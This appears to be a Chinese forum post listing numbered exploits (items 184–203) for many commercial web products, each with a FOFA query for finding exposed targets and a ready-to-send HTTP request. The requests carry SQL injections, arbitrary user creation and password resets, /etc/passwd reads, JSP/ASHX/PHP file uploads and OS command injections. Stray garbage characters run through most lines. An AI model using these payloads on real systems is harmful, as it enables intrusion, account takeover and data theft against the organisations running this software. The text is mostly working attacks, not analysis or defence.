GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1( f# R2 m8 H$ H& I) g
Host: your-ip  f2 b# F8 h' Z  o& D
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
* T. l. m5 }, q1 ?* NAccept-Charset: utf-8/ K' h. i2 y: K. }
Accept-Encoding: gzip, deflate0 |7 T, b/ s% Z2 {& ~0 R
Connection: close. N* p# n* n4 r+ i, P
! f; a; S' y6 X/ G% I

, Y, M& \4 ~6 d; \- K4 K% Z* z" t184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加$ E  _2 G& N) G  y, }% u
FOFA:server="SunFull-Webs"5 H0 }8 G3 b/ @4 w1 P
POST /soap/AddUser HTTP/1.1
6 t/ O, R: ]7 A. s/ G5 |$ M+ Z$ @Host: your-ip) u: q( T9 n- Y7 {* Q6 c' v! Y
Accept-Encoding: gzip, deflate; @* W& Q& q8 L! K. w5 N5 G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
' b5 F5 i+ a# [$ c. F$ A3 w# i' uAccept: application/xml, text/xml, */*; q=0.01
' @4 ^* _, p! k7 B: {Content-Type: text/xml; charset=utf-8
' t! t+ A: `: T. n8 MAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
9 X+ \, S- v, o  c. f; QX-Requested-With: XMLHttpRequest* J8 H7 Z/ K6 k9 d8 H1 J) ~8 g
9 U/ ~; g, g2 ]9 k" I) A, D

# L# t4 [6 ^! u3 C7 ~2 f$ _$ y2 Ainsert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')8 ?4 R+ t, z3 K2 \. w; y8 E  ^

" A6 K# ]  s( H
* x( Y* I2 v; _. l% y9 y185. 瑞友天翼应用虚拟化系统SQL注入1 y5 o& R4 r' P) Y0 l8 l
version < 7.0.5.13 N1 r: p' `* b$ x  X" }8 x% @
FOFA:app="REALOR-天翼应用虚拟化系统"
2 f3 Z$ I8 H- M& IGET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
" R+ D2 G$ w" ~4 }$ BHost: host
+ [6 J8 `, V" O4 W+ a/ {5 {1 M( H8 X% f/ y. ]/ N

5 D6 n. h( O) ^: U, k186. F-logic DataCube3 SQL注入
0 m; f0 ]( L2 P+ _! r0 ICVE-2024-31750
# N! K; h  B/ q& KF-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统, I$ O) r7 k+ }$ h
FOFA:title=="DataCube3"" `8 Y5 [: D# t6 P) {
POST /admin/pr_monitor/getting_index_data.php HTTP/1.13 K2 @% j7 L3 H* Y' S& w
Host: your-ip9 m# V* C' c+ `& _/ K* Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.06 t9 Y; o0 t& M2 q3 z5 p) I; q; |) K
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
+ t: g# o8 ?3 q3 O5 g' `, c9 e) XAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.21 L; l/ m8 E' A2 T
Accept-Encoding: gzip, deflate. _. ?5 t; R8 Z# F. ^1 j2 c: V% `9 Q: z
Connection: close
$ K$ c# h. C( GContent-Type: application/x-www-form-urlencoded
6 }! F/ |# H8 O# n$ n8 ]" J4 I* v8 Z2 E* u+ e" D
req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450* X; Z( i% u0 A

, X/ B0 M/ l! O6 T
) A4 C+ r  w6 j  k# l0 e, {187. Mura CMS processAsyncObject SQL注入
9 p( ]& ^% F6 P4 RCVE-2024-326409 X: b" p) Z" X" S3 T- V! N1 f
FOFA:"Mura CMS"3 B( c/ z; P. t( q4 o
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
$ C' \! x: p& f; }- ~. C; }3 WHost: your-ip
& C( ^& i$ n- h/ h" `Content-Type: application/x-www-form-urlencoded
; t- h% y$ I$ t0 e
% b& ^& V2 v6 x3 J- k3 Z) E- M$ Z" Y* R7 k' R7 R7 `8 ^5 j# h
object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=12 N  E! X# f# ^% C9 r( T

8 D! j' i4 X. b. _1 C. j
: U3 D! q9 B" b0 w5 t6 F0 y188. 叁体-佳会视频会议 attachment 任意文件读取* D( J8 U# ]' e* P' T# K2 h6 Z
version <= 3.9.7
  K: J# q" `' j! ^" W. q: X6 ^FOFA:body="/system/get_rtc_user_defined_info?site_id"# p9 T+ l5 `# A, H% E$ w
GET /attachment?file=/etc/passwd HTTP/1.1
& E& v# g, B  D, {! c/ x; A- ~( PHost: your-ip
6 N8 ?3 _1 R  M) F  i4 V$ cUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36  t% Z0 w4 Q6 o- s
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
& H/ b9 E: w. a: g' nAccept-Encoding: gzip, deflate. k4 R, B1 L$ N* H$ {* n) g
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
0 ~* ]. z  b( H! q3 mConnection: close
5 G  j/ ]+ i' T0 ^
" R# b- s9 P2 N* C6 |8 \! d, q# X; }# Y: m0 M$ W" d  g+ T9 s
189. 蓝网科技临床浏览系统 deleteStudy SQL注入
, c2 \& ]/ C, g7 u+ HFOFA:app="LANWON-临床浏览系统"
7 J" c: f; P7 c9 t3 a5 w- iGET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1" z: h7 W3 D  @
Host: your-ip
; B+ x% R: m. R$ E2 R0 cUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36+ }# `1 h( b: s( S
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
/ s( r- k$ G0 j% fAccept-Encoding: gzip, deflate
0 G. n" O% I0 E) u# b- ~2 R. _Accept-Language: zh-CN,zh;q=0.9" X) i# u+ d0 d# O
Connection: close/ z5 l8 ?& S. m" a! w

  y$ ^7 A  H7 ?, i* d3 F6 s& s: Y9 Y
190. 短视频矩阵营销系统 poihuoqu 任意文件读取
1 D* Z8 O$ @8 }! l0 g3 vFOFA:title=="短视频矩阵营销系统"# w# A9 l2 Q4 M  G
POST /index.php/admin/Userinfo/poihuoqu HTTP/22 J4 O* ]) F, W) {, J% \. J4 f
Host: your-ip1 f- N: r. I( v8 m/ O! K
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
0 |$ {0 h- q/ |, {Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9& _& |" S6 D: C5 _- A. f
Content-Type: application/x-www-form-urlencoded" O/ f+ z7 B1 Q& [) C
Accept-Encoding: gzip, deflate5 N' u( W' E" V: _7 x( x# h+ g
Accept-Language: zh-CN,zh;q=0.9
0 l& q( X5 N: v- ]' ~5 Y/ @+ |7 l+ u' j# Z
poi=file:///etc/passwd
; V; m; {/ N% m- O5 R0 N, d
) {& Y- H- F# R0 ~, V  n1 V" h3 A
8 Z# \4 l1 J4 T* D191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
4 ~6 F9 i2 v  M6 ~FOFA:body="/CDGServer3/index.jsp"+ B3 J4 o) ]# {/ s2 r
POST /CDGServer3/js/../NavigationAjax HTTP/1.1- D3 `& ~, b- B0 G
Host: your-ip
8 S+ ?' d: r( K: @1 _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36( v1 {! u4 W' Z
Content-Type: application/x-www-form-urlencoded0 q8 n6 |! {$ a
8 c$ C- m* Q8 D1 d6 u. k
command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=9 s3 w" [3 n% K% P/ r% c2 ^' z
/ A" \. k, R) t; `2 q

4 v/ G2 v# ]/ H# X192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
: W$ q9 [9 W1 z) v/ yFOFA:title="用户登录_富通天下外贸ERP"
, p/ i7 _' F  g! X: |+ OPOST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
+ }6 B# Y0 F* v* p- p) @& XHost: your-ip8 }5 Q" c7 e( c  K2 x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36! a) U$ W3 A! H( T  I
Content-Type: application/x-www-form-urlencoded$ O- {7 V: l2 F3 q: Z2 {
: \. ]6 A! J0 _! i  P* K% T
# d/ q3 ^4 z! g) v4 A' a
<% @ webhandler language="C#" class="AverageHandler" %>6 ]/ I" G$ N8 \  B. p
using System;
3 L% z3 N3 V% z# `  L) l3 \. T7 iusing System.Web;
. b. c7 ~, j2 E4 Vpublic class AverageHandler : IHttpHandler
. o# Z' N$ @3 I{: f1 b; q, Q) T" c
public bool IsReusable
' B1 S  y; K/ U: g- x{ get { return true; } }6 w6 e# \) `3 Y) P+ i, z" H  q
public void ProcessRequest(HttpContext ctx)
/ x; D% }2 G. L. h( z{. R( ^& h7 v% t& U, Z
ctx.Response.Write("test");- B/ p* v5 N8 I5 @+ `, p4 v
}( P3 t# h+ b) z+ X- |9 y/ m2 A
}6 k# R0 P& R1 R: H# h

8 Y4 j( R. c6 `% _% v+ r) q" s: [2 F* _
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行* X$ c5 F) i' C7 M) [0 z
FOFA:body="山石云鉴主机安全管理系统"
- W' G: d3 ~2 p* P8 U! a: N& \' d( aGET /master/ajaxActions/getTokenAction.php HTTP/1.1
. Z# [) ^7 J: _) s' ^. yHost:+ D; R2 z5 x6 Q* S9 S
Cookie: PHPSESSID=2333333333333;
2 H( F5 R7 P, j) S7 A) MContent-Type: application/x-www-form-urlencoded5 O$ J9 @$ i$ H. T
User-Agent: Mozilla/5.09 {. f/ y9 I9 g

1 ^- T: S- \  y! ^$ I) K/ a/ {6 r" [0 n# Q
, T) Q) s' H, S; _POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1% F( C. l& g& O9 F! A) k* A
Host:
& d5 O5 P( f: }9 R) C& `User-Agent: Mozilla/5.01 M2 x8 d) T8 ?' E$ j% M6 P$ s
Accept-Encoding: gzip, deflate0 T9 F! z% \3 Y5 _( n- Q, M; G
Accept: */*+ N% B  @+ r9 W7 p
Connection: close
* \+ T2 h1 N. \Cookie: PHPSESSID=2333333333333;# X, A* U: m! k# Q
Content-Type: application/x-www-form-urlencoded
4 m: X* q7 O/ v0 zContent-Length: 842 X' I, T; ^4 S; t- W6 p! @. Q; l
9 o' }) K8 J# R; a* _# D: S
param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')
8 r- `; g% M7 U5 j; N; b: l/ a3 _. y( X1 [8 i

( i% d5 n/ ^5 W/ |$ P0 \GET /master/img/config HTTP/1.1
" r: ]" ?  e  t6 _Host:
2 c& F! G+ e1 G% Z0 T! hUser-Agent: Mozilla/5.0. k6 r9 s' E" Q: P) H, d
" l7 p4 o5 A* e/ Q5 j

' ~; p6 b6 {! u1 F  c- y5 Y6 M194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传: J$ z/ T: x& U
FOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在
8 W, _! D: \1 g- }  `( `
' w1 w- G. x5 K0 FPOST /servlet/uploadAttachmentServlet HTTP/1.1
& C* K0 @8 x, Y3 i/ A, ~1 hHost: host
* Q( w" _  A9 L0 g) M) B5 pUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36- Q4 l9 D6 O2 o
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+ [  S) D# n; NAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2) G- O9 R) e3 a- |) W; D
Accept-Encoding: gzip, deflate" G+ y* X( R- M) Y
Connection: close4 W) b. }( J# a, a" y
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk
% f: u7 |4 j- g8 v------WebKitFormBoundaryKNt0t4vBe8cX9rZk2 C% ^- E( L: a
% D4 m- f; E5 K/ ^( n7 J% z
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"% a6 P  f3 ?6 N5 J0 m8 ?9 q- ?; b
Content-Type: text/plain
. ?0 r+ \# t: ]! c" X7 G<% out.println("hello");%>
. ?4 b" r5 k% k' K------WebKitFormBoundaryKNt0t4vBe8cX9rZk6 R  v0 r' A' t  [
Content-Disposition: form-data; name="json"
1 v# ?) m4 i* b! ^) B6 o {"iq":{"query":{"UpdateType":"mail"}}}2 x" y; Q" U; @! \. u
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--
2 D4 _$ A$ v) W( B# A; e1 F  v
0 t, V6 [; I, t0 U& L- C
" z, ]# T9 p4 N# T8 G195. 飞鱼星上网行为管理系统 send_order.cgi命令执行0 `) g( j* C" m) A  s" T+ C9 o
FOFA:title=="飞鱼星企业级智能上网行为管理系统& ]* W5 y$ V- g9 [" h9 |
POST /send_order.cgi?parameter=operation HTTP/1.11 s6 Y! T9 C0 g( x  x
Host: 127.0.0.1
2 R+ d3 b5 q' t  _6 [. iPragma: no-cache
' h+ m' Y$ x7 {7 s' I2 d7 `0 KCache-Control: no-cache# _$ X# \3 s  L1 B' e# z1 Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
% a1 s- W7 \; B) q. F, o' ^Accept: */*8 g8 ~% F: [- S. ^2 h; a
Accept-Encoding: gzip, deflate
+ S2 D+ D; G6 G/ g8 r! iAccept-Language: zh-CN,zh;q=0.9( Q- Q9 n( `/ D: P2 f1 P2 o
Connection: close8 X% U, Z: Z. @9 _9 H
Content-Type: application/x-www-form-urlencoded
6 k6 x6 [/ s/ Y. F  }5 jContent-Length: 68- m5 T& r6 A! w/ d
: a/ ~5 Y' `5 [
{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}
; L1 V2 W! o" H: U- x( `* x* N
$ _1 c( c. y9 B0 g5 {/ O7 C, m0 x  b- ?6 A8 V
196. 河南省风速科技统一认证平台密码重置
! I& J2 l/ C2 N  A8 o  }FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
+ j- N" j$ a7 v5 I8 m) T; W/ h4 T: F  ^POST /cas/userCtl/resetPasswordBySuper HTTP/1.1- H  m: g- q" v
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
5 {& ~) q( ?7 Y+ q2 H1 _. qContent-Type: application/json;charset=UTF-8
: M7 B" ]3 `, M- u  L  X( V% f! y$ h3 ?X-Requested-With: XMLHttpRequest1 @! h" J; V6 S- t& Z
Host:2 ^# b3 d, \5 G2 M! I( L: p
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2; |, b2 c- E4 y! ^2 H
Content-Length: 45
- `' T- D8 x4 \* {' Z: mConnection: close
3 M0 E1 d/ d/ _1 {
- T* l5 w) g8 `1 F) p) e{"xgh":"test","newPass":"test666","email":""}
- U8 `2 i+ x. B' r8 B; ~7 S% ~
/ i+ I  A' C( r) j0 j1 f7 H
7 w. \* x9 i5 }( A6 P" ]  ?
5 F' t3 n$ A" E. a9 I* R197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
5 X5 E! d4 n$ \, X8 KFOFA:app="浙大恩特客户资源管理系统". O0 t2 r6 r* W5 q
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
6 U9 V/ |7 h' c; R- Z( ^7 _# CHost:
( {0 Z: d( n: F: f9 w; A, G# c% Z6 C* w3 vUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36' z' F3 A# l) x/ [/ r6 A; T9 K6 X
Accept-Encoding: gzip, deflate8 ?7 c8 K0 P& V5 [' _3 M& z
Connection: close2 X3 L0 C6 i4 Z1 d0 b
$ t& [5 Y9 j+ U- c6 [5 h
) q% \  `9 D9 y9 t
! z5 g4 r; L) r4 y2 L
198.  阿里云盘 WebDAV 命令注入1 A/ E8 X/ R  \, P
CVE-2024-29640: S/ J. i* o" {8 h( x
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.10 ~4 I) O% R4 C$ X/ Q8 w$ B5 s# O
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
, s2 T9 b" S8 VAccept: */*3 z) A3 a3 a( B. s7 y* J
Accept-Encoding: gzip, deflate9 q9 ?  w/ ]  q0 W
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
0 b# @0 K0 c" f% V8 ]Connection: close! t# _. F0 C  j; ]# y
3 _. f) h8 o0 E8 v8 q* p; ~

4 z8 s3 k- x- w199. cockpit系统assetsmanager_upload接口 文件上传
- Q% v9 m. U' e' l1 r/ F# a4 o- z( w: v( J
1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:
" q: o# w3 ~* R1 c8 ^: f) b, KGET /auth/login?to=/ HTTP/1.1
" q# r' n2 M' w& K* b# n6 i; n, ]$ r- u1 [( Z9 W
响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"6 s& |7 {# y9 c" ~

0 H  p0 r5 [. {6 X! ]2.使用刚才上一步获取到的jwt获取cookie:
) X- V* @6 f) |0 e% j3 H) B) _$ r! l6 y# T4 |4 g7 f; T6 S
POST /auth/check HTTP/1.1" l; U0 l- ~5 t2 l& G
Content-Type: application/json
6 p/ w( f% u% L
" `+ U- n/ l1 ~{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}2 a  A( @: `7 Q+ Z

+ F& @3 y. R$ D# ~5 _9 T响应:200,返回值:
. J) {0 b; y6 D/ v; ISet-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/
* c6 L" t2 n/ n( \) P8 v2 }% PFofa:title="Authenticate Please!"
3 o! D* ~- `& s' B9 yPOST /assetsmanager/upload HTTP/1.17 W9 E) S2 f6 w+ ^3 x" L8 \0 n1 t
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
1 u& [: l' u0 r" l4 `Cookie: mysession=95524f01e238bf51bb60d77ede3bea92
. x8 }! n  n* V4 s: V8 ]) X# G0 b
-----------------------------36D28FBc36bd6feE7Fb38 a* H+ u' C5 k9 c  |( c7 _
Content-Disposition: form-data; name="files[]"; filename="tttt.php"$ r0 m# q9 B/ Q0 E2 V' O/ O
Content-Type: text/php
% `1 [: p! E! b2 P# M  D. w7 x
; B: e: I- T) K" ?+ S/ w<?php echo "tttt";unlink(__FILE__);?>
% `- T: {& }' C-----------------------------36D28FBc36bd6feE7Fb3
5 Q: j4 t  {" d) aContent-Disposition: form-data; name="folder"1 ~4 ~3 g! V+ N4 x3 C! P
" x7 [! S( h) o, V: r+ s- P4 ]8 U
-----------------------------36D28FBc36bd6feE7Fb3--6 V. h$ Y+ o0 ^
! b. ]( u" t) J- ]: ]- Z6 g

( N# e+ @  K: ~' \- n( f- L. v/storage/uploads/tttt.php* w7 F8 ~& T) ]& g, A0 I
; X6 K- {, v" L4 g
200. SeaCMS海洋影视管理系统dmku SQL注入% f2 X3 a* g. k/ B& Q1 H
FOFA:app="海洋CMS"
3 `8 O8 N0 C% X; @9 d! c9 d! r6 U% zGET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1# Z- ^* {$ z9 ], y/ j7 l* }8 F
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s: [& u% y, Z4 i9 n
Upgrade-Insecure-Requests: 1
# B" }/ S' Z0 x8 q2 MCache-Control: max-age=0# N3 J9 ^% m$ I
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
; N. |1 o1 D5 Y$ ?) a  p* |9 k  F& mAccept-Encoding: gzip, deflate
5 q8 _* `' {& F( GAccept-Language: zh-CN,zh;q=0.9
1 h6 x* y3 N5 }' I6 ~  _) V" W- a8 Z; t) n$ f
: d3 `* m' `, i* @8 ], m
201. 方正全媒体新闻采编系统 binary SQL注入7 E: f- I2 P2 ^/ g: R
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"- x/ L+ `& r1 x  P$ v% h
POST /newsedit/newsplan/task/binary.do HTTP/1.1
8 Q  c* g2 l1 U. [Content-Type: application/x-www-form-urlencoded
* c) ], R6 O' H6 AAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" V9 s; u7 q+ n+ y) G, U7 |
Accept-Encoding: gzip, deflate& U7 ~' H' T; c+ u" s( P) b: D4 B
Accept-Language: zh-CN,zh;q=0.9/ L8 K# Z3 u1 q4 s# }2 P
Connection: close
; Y3 g6 ]$ k: L5 v8 M2 y; T1 j6 y
6 H4 |# J' w+ S7 OTableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1
1 b' \- l" Q" o' s3 M' `  Z* e) U# x( Y
7 y  n* V/ Q5 X
202. 微擎系统 AccountEdit任意文件上传
- M9 ^! [8 X0 P3 ?, B: \FOFA:body="/Widgets/WidgetCollection/"
. v$ @) Z, ]6 \9 i! J$ m" j获取__VIEWSTATE和__EVENTVALIDATION值
! ?3 K4 n1 K1 L% [$ L5 f7 K, O" tGET /User/AccountEdit.aspx HTTP/1.1
- P. C6 K) b- zHost: 滑板人之家
2 s$ c6 b! x6 V3 h6 I/ iUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.311 K- s& [! ]) ?/ W% T2 M
Content-Length: 0, s# ]  |2 Z5 V! ]0 Q& y8 ~! T

( M9 `: S/ t9 j6 x& ?# e+ H9 M, t" ^) ^; t5 U( ?* z. k9 }. z+ ^" H9 j
替换__VIEWSTATE和__EVENTVALIDATION值
, l3 ^4 g. e' [POST /User/AccountEdit.aspx HTTP/1.1
9 h8 ^2 N7 C" [. o- h3 \Accept-Encoding: gzip, deflate, br7 Y7 p* p' j4 a, M
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687# C7 V) _9 ^/ j# c9 O7 Z: v

% T( J. h" r- ^* d' F0 v7 ^6 d5 N-----------------------------786435874t385875938657365873465673587356875 ?/ q/ Y/ ^  }# T8 k# N8 m
Content-Disposition: form-data; name="__VIEWSTATE"
. ^( J8 E8 J+ l( ~, n
- l/ Q. D, ~1 n) O& x1 C3 M__VIEWSTATE
  {" L5 q' S# z2 d( ~) k1 @0 |' [9 E3 x-----------------------------786435874t38587593865736587346567358735687. y" q7 J! g$ \; ^3 @% ]; ~
Content-Disposition: form-data; name="__EVENTVALIDATION"0 p8 L  D0 q" {$ K9 T
$ i" `6 D3 Y% n% |$ ^1 k8 r
__EVENTVALIDATION
0 K9 Y3 ]3 k* U6 s( P; `( W- r9 L-----------------------------786435874t38587593865736587346567358735687
- T( j2 q3 O% eContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
  y3 p. N4 l% X$ gContent-Type: text/plain
3 m; [! ]" w) Y; T7 L7 _6 x. Z* N$ H9 w' r
Hello World!
+ k0 \7 a8 ]( P- x$ |-----------------------------786435874t385875938657365873465673587356877 ^$ h) U- g  p1 x8 w
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"
8 w$ l: B: e9 W7 f+ q0 K0 t8 J. F4 T- A8 b+ I8 Z. _. O' ^2 ~
上传图片4 w+ `; I9 m+ D( Y5 B
-----------------------------786435874t38587593865736587346567358735687
# G% S( S4 f: J, ?: T9 e2 X3 A, DContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"- R8 X7 C! _- ]
9 `" S5 a5 p2 J  y5 E# }  Y0 _
4 ?  U- ]: n% y0 h! r% z
-----------------------------786435874t38587593865736587346567358735687
& Q3 V- l1 K; E/ oContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"* q9 P& T+ b; M1 r, h2 q% v
' _4 l8 |+ F, Z# n$ r+ u
9 N9 L& {/ A& u' d1 X: |
-----------------------------786435874t38587593865736587346567358735687--& z' P* l& w/ s* I: x% G

' e; k2 _+ j0 L6 `" ], A4 J- B0 R% w! O* b+ j. q/ y
/_data/Uploads/1123.txt
2 v; I, W8 X; F& f( H! a4 M9 D1 W0 l
6 k0 N2 Z/ A* B( b2 J203. 红海云EHR PtFjk 文件上传6 [% R+ h' g! M0 M
FOFA:body="RedseaPlatform"
# d, \; x' R/ V5 t( L0 GPOST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
8 Z9 N0 l+ d8 w2 CHost: x.x.x.x
0 Q, h( _; x3 ?# h. EAccept-Encoding: gzip  i: g& C; N9 x/ h
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
8 [( s0 W: ]  y8 @1 FContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys43 n* \2 Q: V8 a+ H9 y5 u
Content-Length: 210
$ H0 Y/ \8 h3 S; t8 K9 S  N+ Y$ C1 \" i; K6 r3 Q* r
------WebKitFormBoundaryt7WbDl1tXogoZys4
- L, b+ H, d* z5 cContent-Disposition: form-data; name="fj_file"; filename="11.jsp": x/ F$ a4 ~: Z/ ?* d' \- O2 S/ t
Content-Type:image/jpeg8 Q: H  f3 }. i- l% m  s
% i2 w; z+ y* ?% S0 y, U. C! M
<% out.print("hello,eHR");%>$ ?6 M0 D8 B$ s- b
------WebKitFormBoundaryt7WbDl1tXogoZys4--
' l( t* Q& b9 k  e9 @2 x1 C+ |) a+ m; n& I' \
# Q) v( b: X1 Z- _- C5 y( C3 Y+ m

, ]" {; P* a: ]4 j
. E" w% H% X8 W* }
1 ^4 j+ {" o; v8 k+ K
3 A, Z3 w  ?; L) h; s
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表